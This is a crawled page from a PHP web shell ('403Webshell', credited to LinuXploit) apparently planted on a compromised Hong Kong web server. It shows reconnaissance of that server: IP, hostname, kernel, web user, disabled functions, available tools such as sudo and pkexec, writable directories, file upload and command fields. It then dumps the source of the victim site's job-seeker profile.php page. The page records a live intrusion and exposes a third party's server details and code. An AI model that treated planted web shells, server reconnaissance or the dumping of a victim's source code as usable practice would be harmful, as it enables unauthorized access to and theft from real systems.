403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/jobsreader/seeker/view/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/jobsreader/seeker/view/profile.php
<!DOCTYPE html>
<html lang="en-HK" prefix="og: http://ogp.me/ns#">

<head>
    <title>JobReader - Profile</title>
    <!-- css -->
    <?php include 'inc/headlinks.php'; ?>
    <!-- js -->
    <?php include 'inc/link-js.php'; ?>
</head>

<body>

    <!-- header -->
    <?php include 'inc/header.php'; ?>
    <!-- end of header-->

    <?php include 'inc/profile_nav.php'; ?>

    <div class="grayBg">
        <div class="container">
            <div class="font09 text-center setpWrapper">
                <h3 class="mb-4">Strengthen your profile. Let employers know more about you.
                </h3>
                <div class="setpWrap text-center">
                    <div class="stepImg justify-content-center">
                        <div class="form-steps__item formStep0 form-steps__item--completed">
                            <div class="form-steps__item-content">
                                <span class="form-steps__item-icon"></span>
                            </div>
                        </div>
                        <div class="form-steps__item formStep1">
                            <div class="form-steps__item-content">
                                <span class="form-steps__item-icon"></span>
                                <span class="form-steps__item-line"></span>

                            </div>
                        </div>
                        <div class="form-steps__item formStep2">
                            <div class="form-steps__item-content">
                                <span class="form-steps__item-icon"></span>
                                <span class="form-steps__item-line"></span>

                            </div>
                        </div>
                        <div class="form-steps__item formStep3">
                            <div class="form-steps__item-content">
                                <span class="form-steps__item-icon"></span>
                                <span class="form-steps__item-line"></span>
                            </div>
                        </div>
                        <div class="form-steps__item formStep4">
                            <div class="form-steps__item-content">
                                <span class="form-steps__item-icon"></span>
                                <span class="form-steps__item-line"></span>

                            </div>
                        </div>
                        <div class="form-steps__item formStep5">
                            <div class="form-steps__item-content">
                                <span class="form-steps__item-icon"></span>
                                <span class="form-steps__item-line"></span>

                            </div>
                        </div>
                    </div>
                </div>
                <div class="d-flex stepDetailBar">
                    <a class="blueWord mr-1 mb-0 stepTitle text-left" href="#basic_info">Basic Info:
                    </a>
                    <p class="mb-0 stepDetail text-left">Add personal details.</p>
                    <div class="ml-auto nowrap">
                        <a href="#" class="mr-2 disabled prevStepBtn step01" readonly><i
                                class="fas fa-chevron-left"></i></a>
                        <a href="#" class="step01 nextStepBtn"><i class="fas fa-chevron-right"></i></a>
                    </div>
                </div>
                <a href="javascript:void(0);" class="warningCloseBtn fieldWord"><i class="fas fa-times"></i></a>
            </div>

        </div>
    </div>
    </div>

    <div class="container">
        <div class="row subMenuWrap noborder">
            <div class="ml-auto mt-2">
                <!-- <a href="#" class="link mr-4" data-toggle="modal" data-target=".deletCandidates"><i
                        class="far fa-times-circle"></i> Preview</a>-->
                <a href="profile_preview.php" class="link mr-4"><i class="far fa-file-alt"></i> Preview</a>
                <a href="#" class="link mr-4"><i class="fas fa-share"></i> Forward</a>
                <a href="#" class="link"><i class="far fa-file-pdf"></i> Save to PDF</a>
            </div>
        </div>
    </div>

    <section class="wrapper">

        <div class="container ">
            <div class="basic_info" id="basic_info">
                <?php include 'page/basic_info.html'; ?>

            </div>

            <div class="employment" id="employment">
                <?php include 'page/employment.html'; ?>

            </div>
            <div class="education" id="education">
                <?php include 'page/education.html'; ?>

            </div>
            <div class="skill" id="skill">
                <?php include 'page/skill.html'; ?>

            </div>
            <div class="language" id="language">
                <?php include 'page/language.html'; ?>

            </div>
        </div>



    </section>

    <!-- end #section -->




    <!-- footer -->
    <?php include 'inc/footer_n.php'; ?>




    <!-- end of footer -->


    <script type="text/javascript" src="../assets/js/ajax.js"></script>

    <!--  <script type="text/javascript" src="../assets/js/select2.js"></script>-->
    <!-- <script type="text/javascript" src="../assets/js/selectcheckbox.js"></script> -->
    <script type="text/javascript" src="../assets/js/bootstrap-select.js"></script>
    <!-- custom JS -->
    
</body>






<script>
$(function() {





    loopMonth();
    loopYear();
    loopExp();
    loopGraYear();

    $('[data-toggle="tooltip"]').tooltip();
});
$(".editProfileBtn").click(function() {
    $(this).closest(".previewRowDetail").hide();
    $(this).closest(".previewRowDetail").parent().find(".editRowDetail").fadeIn();

});


$(".cancelEditBtn").click(function() {
    $(this).closest(".editRowDetail").hide();
    $(this).closest(".editRowDetail").parent().find(".previewRowDetail").fadeIn();

});

$(".saveEditBtn").click(function() {
    $(this).closest(".editRowDetail").hide();
    $(this).closest(".editRowDetail").parent().find(".previewRowDetail").fadeIn();

});

$('.stepTitle[href^="#"]').click(function() {
    $('html, body').animate({
        scrollTop: $($.attr(this, 'href')).offset().top
    }, 500);

    return false;
});


$(document).on("click", ".step01.nextStepBtn", function() {
    $(this).attr("class", "step02 nextStepBtn");
    $(".formStep0").removeClass("form-steps__item--completed").addClass("form-steps__item--active");
    $(".formStep1").addClass("form-steps__item--completed");
    $(".prevStepBtn").removeClass("disabled").attr("readonly", false);
    $(".prevStepBtn").attr("class", "step01 prevStepBtn mr-2");
    $(".stepTitle").text("Employment Summary:");
    $(".stepTitle").attr("href", "#employment");
    $(".stepDetail").text("Add work experiences and job description.");

});
$(document).on("click", ".step02.nextStepBtn", function() {
    $(".formStep1").removeClass("form-steps__item--completed").addClass("form-steps__item--active");
    $(".formStep2").addClass("form-steps__item--completed");
    $(this).attr("class", "step03 nextStepBtn");
    $(".prevStepBtn").attr("class", "step02 prevStepBtn mr-2");
    $(".stepTitle").text("Education Summary:");
    $(".stepTitle").attr("href", "#education");
    $(".stepDetail").text("Add education & field of study.");
    // Does some stuff and logs the event to the console
});
$(document).on("click", ".step03.nextStepBtn", function() {
    $(".formStep2").removeClass("form-steps__item--completed").addClass("form-steps__item--active");
    $(".formStep3").addClass("form-steps__item--completed");
    $(this).attr("class", "step04 nextStepBtn");
    $(".prevStepBtn").attr("class", "step03 prevStepBtn mr-2");
    $(".stepTitle").text("Skills:");
    $(".stepTitle").attr("href", "#skill");
    $(".stepDetail").text("Add skills to show your strength points.");
    // Does some stuff and logs the event to the console
});
$(document).on("click", ".step04.nextStepBtn", function() {
    $(".formStep3").removeClass("form-steps__item--completed").addClass("form-steps__item--active");
    $(".formStep4").addClass("form-steps__item--completed");
    $(this).attr("class", "step05 nextStepBtn");
    $(".prevStepBtn").attr("class", "step04 prevStepBtn mr-2");
    $(".stepTitle").text("Languages:");
    $(".stepTitle").attr("href", "#language");
    $(".stepDetail").text("Add languages you know.");
    // Does some stuff and logs the event to the console
});
$(document).on("click", ".step05.nextStepBtn", function() {
    $(".formStep4").removeClass("form-steps__item--completed").addClass("form-steps__item--active");
    $(".formStep5").addClass("form-steps__item--finished");
    $(this).attr("class", "step06 nextStepBtn disabled");
    $(".prevStepBtn").attr("class", "step05 prevStepBtn mr-2");
    $(".stepTitle").text("Complete!");

    $(".stepDetail").text("Your profile is ready.");
    // Does some stuff and logs the event to the console
});
$(document).on("click", ".step05.prevStepBtn", function() {
    $(".formStep4").addClass("form-steps__item--completed").removeClass("form-steps__item--active");
    $(".formStep5").removeClass("form-steps__item--finished");
    $(".nextStepBtn").attr("class", "step05 nextStepBtn");
    $(this).attr("class", "step04 prevStepBtn mr-2");
    $(".stepTitle").text("Languages:");
    $(".stepTitle").attr("href", "#language");
    $(".stepDetail").text("Add languages you know.");
    // Does some stuff and logs the event to the console
});
$(document).on("click", ".step04.prevStepBtn", function() {
    $(".formStep3").addClass("form-steps__item--completed").removeClass("form-steps__item--active");
    $(".formStep4").removeClass("form-steps__item--completed");
    $(".nextStepBtn").attr("class", "step04 nextStepBtn");
    $(this).attr("class", "step03 prevStepBtn mr-2");
    $(".stepTitle").text("Skills:");
    $(".stepTitle").attr("href", "#skill");
    $(".stepDetail").text("Add skills to show your strength points.");
    // Does some stuff and logs the event to the console
});
$(document).on("click", ".step03.prevStepBtn", function() {
    $(".formStep2").addClass("form-steps__item--completed").removeClass("form-steps__item--active");
    $(".formStep3").removeClass("form-steps__item--completed");
    $(".nextStepBtn").attr("class", "step03 nextStepBtn");
    $(this).attr("class", "step02 prevStepBtn mr-2");
    $(".stepTitle").text("Education Summary:");
    $(".stepTitle").attr("href", "#education");
    $(".stepDetail").text("Add education & field of study.");
    // Does some stuff and logs the event to the console
});
$(document).on("click", ".step02.prevStepBtn", function() {
    $(".formStep1").addClass("form-steps__item--completed").removeClass("form-steps__item--active");
    $(".formStep2").removeClass("form-steps__item--completed");
    $(".nextStepBtn").attr("class", "step02 nextStepBtn");
    $(this).attr("class", "step01 prevStepBtn mr-2");
    $(".stepTitle").text("Employment Summary:");
    $(".stepTitle").attr("href", "#employment");
    $(".stepDetail").text("Add work experiences and job description.");
    // Does some stuff and logs the event to the console
});
$(document).on("click", ".step01.prevStepBtn", function() {
    $(".formStep0").addClass("form-steps__item--completed").removeClass("form-steps__item--active");
    $(".formStep1").removeClass("form-steps__item--completed");
    $(".nextStepBtn").attr("class", "step01 nextStepBtn");
    $(this).addClass("disabled").attr("readonly", true);
    $(".stepTitle").text("Basic Info:");
    $(".stepTitle").attr("href", "#basic_info");
    $(".stepDetail").text("Add personal details.");
    // Does some stuff and logs the event to the console
});
</script>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit